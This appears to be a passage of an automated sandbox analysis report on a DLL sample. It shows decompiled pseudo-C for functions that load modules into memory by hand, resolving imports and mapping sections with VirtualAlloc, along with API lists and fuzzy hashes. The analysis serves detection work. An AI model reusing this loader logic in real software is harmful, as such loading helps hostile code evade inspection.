                                                                                                                                                      0x1001aa10
                                                                                                                                                      0x1001a9b5
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,1001BA3C), ref: 1001AA42
                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,1001BA3C), ref: 1001AA49
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                      • Opcode ID: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
                                                                                                                                                      • Instruction ID: 4d02d4e2172aadf48441733df7480d9fc57cbb1c8efede5bdbb7e0f8d5fbe0c0
                                                                                                                                                      • Opcode Fuzzy Hash: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
                                                                                                                                                      • Instruction Fuzzy Hash: B431A178A00108EFDB04DF94CA94AADB7B6FF89304F248198E9055B395C775EE85DB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 34%
                                                                                                                                                      			E1001ABA3() {
                                                                                                                                                      				signed int _t93;
                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                      				signed int _t99;
                                                                                                                                                      				signed int _t106;
                                                                                                                                                      				signed int _t114;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				void* _t121;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      				signed int _t173;
                                                                                                                                                      				void* _t180;
                                                                                                                                                      				void* _t181;
                                                                                                                                                      				void* _t182;
                                                                                                                                                      				void* _t184;
                                                                                                                                                      				void* _t186;
                                                                                                                                                      				void* _t187;
                                                                                                                                                      
                                                                                                                                                      				L0:
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L0:
                                                                                                                                                      					 *(_t182 - 4) =  *(_t182 - 4) + 0x14;
                                                                                                                                                      					if(IsBadReadPtr( *(_t182 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t182 - 4) + 0xc)) == 0) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					L3:
                                                                                                                                                      					_t7 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                      					_t12 =  *((intOrPtr*)(_t182 + 8)) + 0x24; // 0xf3c7e850, executed
                                                                                                                                                      					_t97 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0xc)),  *_t7); // executed
                                                                                                                                                      					_t186 = _t184 + 8;
                                                                                                                                                      					 *((intOrPtr*)(_t182 - 0x20)) = _t97;
                                                                                                                                                      					if( *((intOrPtr*)(_t182 - 0x20)) != 0) {
                                                                                                                                                      						L5:
                                                                                                                                                      						_t17 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                      						_push(4 +  *_t17 * 4);
                                                                                                                                                      						_t21 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
                                                                                                                                                      						_push( *_t21);
                                                                                                                                                      						_t99 = E1000E018(_t127,  *_t21, _t180, _t181, __eflags);
                                                                                                                                                      						_t187 = _t186 + 8;
                                                                                                                                                      						 *(_t182 - 0x18) = _t99;
                                                                                                                                                      						__eflags =  *(_t182 - 0x18);
                                                                                                                                                      						if( *(_t182 - 0x18) != 0) {
                                                                                                                                                      							L7:
                                                                                                                                                      							 *( *((intOrPtr*)(_t182 + 8)) + 8) =  *(_t182 - 0x18);
                                                                                                                                                      							_t34 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                      							_t36 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
                                                                                                                                                      							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t182 - 0x20));
                                                                                                                                                      							_t41 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                      							 *( *((intOrPtr*)(_t182 + 8)) + 0xc) =  *_t41 + 1;
                                                                                                                                                      							__eflags =  *( *(_t182 - 4));
                                                                                                                                                      							if( *( *(_t182 - 4)) == 0) {
                                                                                                                                                      								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                      								_t106 =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                      								__eflags = _t106;
                                                                                                                                                      								 *(_t182 - 0x14) = _t106;
                                                                                                                                                      							} else {
                                                                                                                                                      								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 4));
                                                                                                                                                      								 *(_t182 - 0x14) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                      							}
                                                                                                                                                      							while(1) {
                                                                                                                                                      								L12:
                                                                                                                                                      								__eflags =  *( *(_t182 - 0x1c));
                                                                                                                                                      								if( *( *(_t182 - 0x1c)) == 0) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								L13:
                                                                                                                                                      								__eflags =  *( *(_t182 - 0x1c)) & 0x80000000;
                                                                                                                                                      								if(( *( *(_t182 - 0x1c)) & 0x80000000) == 0) {
                                                                                                                                                      									 *((intOrPtr*)(_t182 - 0x24)) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 0x1c));
                                                                                                                                                      									_t77 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                      									_t114 =  *((intOrPtr*)(_t182 - 0x24)) + 2;
                                                                                                                                                      									__eflags = _t114;
                                                                                                                                                      									_t81 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
                                                                                                                                                      									_t116 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t182 - 0x20)), _t114,  *_t77);
                                                                                                                                                      									_t187 = _t187 + 0xc;
                                                                                                                                                      									 *( *(_t182 - 0x14)) = _t116;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t67 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                      									_t71 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
                                                                                                                                                      									_t121 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t182 - 0x20)),  *( *(_t182 - 0x1c)) & 0x0000ffff,  *_t67);
                                                                                                                                                      									_t187 = _t187 + 0xc;
                                                                                                                                                      									 *( *(_t182 - 0x14)) = _t121;
                                                                                                                                                      								}
                                                                                                                                                      								L16:
                                                                                                                                                      								__eflags =  *( *(_t182 - 0x14));
                                                                                                                                                      								if( *( *(_t182 - 0x14)) != 0) {
                                                                                                                                                      									L18:
                                                                                                                                                      									L11:
                                                                                                                                                      									 *(_t182 - 0x1c) =  &(( *(_t182 - 0x1c))[1]);
                                                                                                                                                      									_t173 =  *(_t182 - 0x14) + 4;
                                                                                                                                                      									__eflags = _t173;
                                                                                                                                                      									 *(_t182 - 0x14) = _t173;
                                                                                                                                                      									continue;
                                                                                                                                                      								} else {
                                                                                                                                                      									L17:
                                                                                                                                                      									 *(_t182 - 0xc) = 0;
                                                                                                                                                      								}
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							L19:
                                                                                                                                                      							__eflags =  *(_t182 - 0xc);
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								L21:
                                                                                                                                                      								continue;
                                                                                                                                                      							} else {
                                                                                                                                                      								L20:
                                                                                                                                                      								_t87 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                      								_t90 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
                                                                                                                                                      								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t182 - 0x20)),  *_t87);
                                                                                                                                                      								SetLastError(0x7f);
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							L6:
                                                                                                                                                      							_t25 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                      							_t28 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
                                                                                                                                                      							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t182 - 0x20)),  *_t25);
                                                                                                                                                      							SetLastError(0xe);
                                                                                                                                                      							 *(_t182 - 0xc) = 0;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						L4:
                                                                                                                                                      						SetLastError(0x7e);
                                                                                                                                                      						 *(_t182 - 0xc) = 0;
                                                                                                                                                      					}
                                                                                                                                                      					break;
                                                                                                                                                      				}
                                                                                                                                                      				L22:
                                                                                                                                                      				_t93 =  *(_t182 - 0xc);
                                                                                                                                                      				return _t93;
                                                                                                                                                      			}



















                                                                                                                                                      APIs
                                                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                      • _realloc.LIBCMT ref: 1001AC1B
                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 1001AC44
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$Read_realloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 252108943-0
                                                                                                                                                      • Opcode ID: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
                                                                                                                                                      • Instruction ID: fc8650bffc04b339d430b1508d1055308318352e03b6944bc6f0970fdcc69cd6
                                                                                                                                                      • Opcode Fuzzy Hash: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
                                                                                                                                                      • Instruction Fuzzy Hash: B501EF74A00208EFDB04CF94C985B9DB7B1FF49359F608198E90AAB350C378EA81DB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E1001B300(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				void* _t78;
                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                      				intOrPtr _t95;
                                                                                                                                                      				void* _t100;
                                                                                                                                                      				void* _t140;
                                                                                                                                                      				void* _t141;
                                                                                                                                                      				void* _t142;
                                                                                                                                                      				void* _t143;
                                                                                                                                                      				void* _t144;
                                                                                                                                                      				void* _t145;
                                                                                                                                                      
                                                                                                                                                      				_t141 = __esi;
                                                                                                                                                      				_t140 = __edi;
                                                                                                                                                      				_t100 = __ebx;
                                                                                                                                                      				_t2 = _a16 + 4; // 0xe90575c0
                                                                                                                                                      				_v20 =  *_t2;
                                                                                                                                                      				_t6 =  *_a16 + 0x14; // 0x2b34508b
                                                                                                                                                      				_t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x1001b95d
                                                                                                                                                      				_v24 =  *_a16 + _t8;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				while(1) {
                                                                                                                                                      					_t16 =  *_a16 + 6; // 0xe2e905
                                                                                                                                                      					if(_v8 >= ( *_t16 & 0x0000ffff)) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
                                                                                                                                                      						_t44 = _v24 + 0x14; // 0x2b34508b
                                                                                                                                                      						_t46 = _v24 + 0x10; // 0xb04d8b02
                                                                                                                                                      						_t78 = E1001AE40(_a8,  *_t44 +  *_t46);
			_t143 = _t142 + 8;
			if(_t78 != 0) {
				_t49 = _a16 + 0x34; // 0x8b0aeb18
				_t51 = _v24 + 0x10; // 0xb04d8b02
				_t54 = _v24 + 0xc; // 0x8bb8558b
				_t56 = _a16 + 0x1c; // 0x8b1874b4, executed
				_t82 =  *((intOrPtr*)( *_t56))(_v20 +  *_t54,  *_t51, 0x1000, 4,  *_t49); // executed
				_t144 = _t143 + 0x14;
				_v12 = _t82;
				if(_v12 != 0) {
					_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
					E1000D190(_t100, _t140, _t141, _v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *((intOrPtr*)(_v24 + 0x10)));
					_t142 = _t144 + 0xc;
					 *((intOrPtr*)(_v24 + 8)) = _v12;
					L1:
					_v8 = _v8 + 1;
					_v24 = _v24 + 0x28;
					continue;
				}
				return 0;
			}
			return 0;
		}
		_v16 =  *((intOrPtr*)(_a12 + 0x38));
		if(_v16 <= 0) {
			L8:
			goto L1;
		}
		_t25 = _a16 + 0x34; // 0x8b0aeb18
		_t29 = _v24 + 0xc; // 0x8bb8558b
		_t31 = _a16 + 0x1c; // 0x8b1874b4
		_t95 =  *((intOrPtr*)( *_t31))(_v20 +  *_t29, _v16, 0x1000, 4,  *_t25);
		_t145 = _t142 + 0x14;
		_v12 = _t95;
		if(_v12 != 0) {
			_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
			 *((intOrPtr*)(_v24 + 8)) = _v12;
			E1000CF20(_t140, _v12, 0, _v16);
			_t142 = _t145 + 0xc;
			goto L8;
		}
		return 0;
	}
	return 1;
}



















APIs
Memory Dump Source
• Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
• Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
• Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
• Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
• Instruction ID: a005275a1ccb32e2261c4421282f910c29d49b3246cd882dcb7603a91dee7caf
• Opcode Fuzzy Hash: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
• Instruction Fuzzy Hash: 7951A7B4A0010ADFCB04DF94D991EAEB7B5FF48304F248599E915AB346D730EE91CBA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001AAF0(void* __ecx, CHAR* _a4) {
	struct HINSTANCE__* _v8;
	struct HINSTANCE__* _t6;

	_t6 = LoadLibraryA(_a4); // executed
	_v8 = _t6;
	if(_v8 != 0) {
		return _v8;
	}
	return 0;
}






APIs
Memory Dump Source
• Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
• Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
• Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
• Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
• Instruction ID: 175513b2d3b99921c95d5b3868ca5ca2b884793c4c363252687910afe3f21655
• Opcode Fuzzy Hash: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
• Instruction Fuzzy Hash: 4CD0927490924CEBCB10DFA4DA88A8EB7F8EB09251F208595FC0997201D631DE809AA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001AAC0(struct HINSTANCE__* _a4) {
	int _t3;

	_t3 = FreeLibrary(_a4); // executed
	return _t3;
}




                                                                                                                                                      0x1001aac7
                                                                                                                                                      0x1001aace

APIs
Memory Dump Source
• Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
• Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
• Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
• Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
• Instruction ID: d41d78d4d80a0482e50fbcd51c543f3b4bec57f301915c91e4edb7b1fe7fc2cd
• Opcode Fuzzy Hash: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
• Instruction Fuzzy Hash: E3B0123100030CBBCE005BD8E8888C53B9C96085117004000F60C83100C630F44046E4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
	void* _t5;
	void* _t13;

	E10015254();
	_push(_a4);
	_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
	return _t5;
}





                                                                                                                                                      0x1000ebd1
                                                                                                                                                      0x1000ebd6
                                                                                                                                                      0x1000ebe2
                                                                                                                                                      0x1000ebe8

                                                                                                                                                      APIs
                                                                                                                                                      • ___security_init_cookie.LIBCMT ref: 1000EBD1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___security_init_cookie
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3657697845-0
                                                                                                                                                      • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                      • Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
                                                                                                                                                      • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                      • Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                      			E10004520(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                      				signed char* _v56;
                                                                                                                                                      				char _v128;
                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                      				void* _v136;
                                                                                                                                                      				void* _v140;
                                                                                                                                                      				void* _v144;
                                                                                                                                                      				char* _v148;
                                                                                                                                                      				char _v164;
                                                                                                                                                      				intOrPtr _v168;
                                                                                                                                                      				intOrPtr _v172;
                                                                                                                                                      				intOrPtr _v176;
                                                                                                                                                      				intOrPtr _v180;
                                                                                                                                                      				char _v184;
                                                                                                                                                      				char _v188;
                                                                                                                                                      				char _v192;
                                                                                                                                                      				intOrPtr _v196;
                                                                                                                                                      				char _v200;
                                                                                                                                                      				char _v204;
                                                                                                                                                      				char _v208;
                                                                                                                                                      				intOrPtr _v212;
                                                                                                                                                      				char _v216;
                                                                                                                                                      				char _v220;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                      				void* _t63;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				void* _t73;
                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                      				intOrPtr _t86;
                                                                                                                                                      				intOrPtr _t96;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				void* _t100;
                                                                                                                                                      				void* _t102;
                                                                                                                                                      
                                                                                                                                                      				_t102 = __eflags;
                                                                                                                                                      				_t55 = _a4;
                                                                                                                                                      				_t96 = _a8;
                                                                                                                                                      				_v184 = E10004490;
                                                                                                                                                      				_v180 = E100044C0;
                                                                                                                                                      				_v176 = _t55;
                                                                                                                                                      				_v172 = _t55;
                                                                                                                                                      				_v168 = _t96;
                                                                                                                                                      				_t97 = 0;
                                                                                                                                                      				E100071F0();
                                                                                                                                                      				_v216 = E100046C0;
                                                                                                                                                      				_v212 = E100046E0;
                                                                                                                                                      				_v200 = E100046C0;
                                                                                                                                                      				_v196 = E100046E0;
                                                                                                                                                      				E10007530( &_v164, 0);
                                                                                                                                                      				_v136 = 0;
                                                                                                                                                      				_v136 = _v216( &_v216, _t96);
                                                                                                                                                      				_v132 = _t96;
                                                                                                                                                      				_v148 =  &_v184;
                                                                                                                                                      				_v140 = 0;
                                                                                                                                                      				_v144 = 0;
                                                                                                                                                      				E100048A0(_t102,  &_v128);
                                                                                                                                                      				_t63 = E10006FD0(__ebp, _t102,  &_v128,  &_v164,  &_v216,  &_v200);
                                                                                                                                                      				_t100 =  &_v220 + 0x24;
                                                                                                                                                      				if(_t63 == 0) {
                                                                                                                                                      					_v204 = 0xffffffff;
                                                                                                                                                      					_v208 = 0;
                                                                                                                                                      					_v220 = 0;
                                                                                                                                                      					_v192 = 0;
                                                                                                                                                      					_v188 = 0;
                                                                                                                                                      					if(( *_v56 & 0x00000080) == 0) {
                                                                                                                                                      						_t70 = E10007010( &_v128,  &_v164, 0,  &_v204,  &_v208,  &_v220,  &_v192,  &_v188,  &_v216,  &_v200);
                                                                                                                                                      						_t100 = _t100 + 0x28;
                                                                                                                                                      						if(_t70 == 0) {
                                                                                                                                                      							_t73 = VirtualAlloc(0, _v220 + 1, 0x3000, 4); // executed
                                                                                                                                                      							_t97 = _t73;
                                                                                                                                                      							if(_t97 != 0) {
                                                                                                                                                      								_t76 = _a12;
                                                                                                                                                      								_t107 = _t76;
                                                                                                                                                      								_t86 = _v220;
                                                                                                                                                      								if(_t76 != 0) {
                                                                                                                                                      									 *_t76 = _t86;
                                                                                                                                                      								}
                                                                                                                                                      								E1000D190(0, _t96, _t97, _t97, _v208, _t86);
                                                                                                                                                      								_t100 = _t100 + 0xc;
                                                                                                                                                      								 *((char*)(_v220 + _t97)) = 0;
                                                                                                                                                      							}
                                                                                                                                                      							_v212( &_v216, _v208);
                                                                                                                                                      							_t100 = _t100 + 8;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				E100048E0(_t107,  &_v128,  &_v216);
                                                                                                                                                      				return _t97;
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10004653
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                      • Opcode ID: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                      • Instruction ID: 5f3268faf400ee4384dde952e7e6cf138bea3fab27ca3dfaa28aee59be70a859
                                                                                                                                                      • Opcode Fuzzy Hash: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                      • Instruction Fuzzy Hash: BB4119B6408341AFD310CF55D88099BBBE8FBC8294F404E1EF59983255EB71E909CBA7
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001AB20(void* _a4, long _a8, long _a12) {
                                                                                                                                                      				int _t5;
                                                                                                                                                      
                                                                                                                                                      				_t5 = VirtualFree(_a4, _a8, _a12); // executed
                                                                                                                                                      				return _t5;
                                                                                                                                                      			}




                                                                                                                                                      0x1001ab2f
                                                                                                                                                      0x1001ab36

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 1001AB2F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                      • Opcode ID: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                      • Instruction ID: c3865ccbcae920e215e079fb98926607579ac42653a45aa6abdb7f6c5b589da4
                                                                                                                                                      • Opcode Fuzzy Hash: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                      • Instruction Fuzzy Hash: F4C04C7621420CABCB04DF98DCD4CAB77ADAB8CB10B10C508FB1D87200C634F9118BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                                      			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				char* _v16;
                                                                                                                                                      				BYTE* _v20;
                                                                                                                                                      				int _v24;
                                                                                                                                                      				int _v28;
                                                                                                                                                      				int _v32;
                                                                                                                                                      				int _v36;
                                                                                                                                                      				char _v299;
                                                                                                                                                      				char _v300;
                                                                                                                                                      				char _v563;
                                                                                                                                                      				char _v564;
                                                                                                                                                      				signed int _v568;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				BYTE* _t66;
                                                                                                                                                      				int _t69;
                                                                                                                                                      				int _t70;
                                                                                                                                                      				int _t71;
                                                                                                                                                      				long _t72;
                                                                                                                                                      				int _t75;
                                                                                                                                                      				signed int _t90;
                                                                                                                                                      				void* _t120;
                                                                                                                                                      				void* _t121;
                                                                                                                                                      				void* _t122;
                                                                                                                                                      				void* _t123;
                                                                                                                                                      				void* _t124;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      
                                                                                                                                                      				_t119 = __esi;
                                                                                                                                                      				_t118 = __edi;
                                                                                                                                                      				_t91 = __ebx;
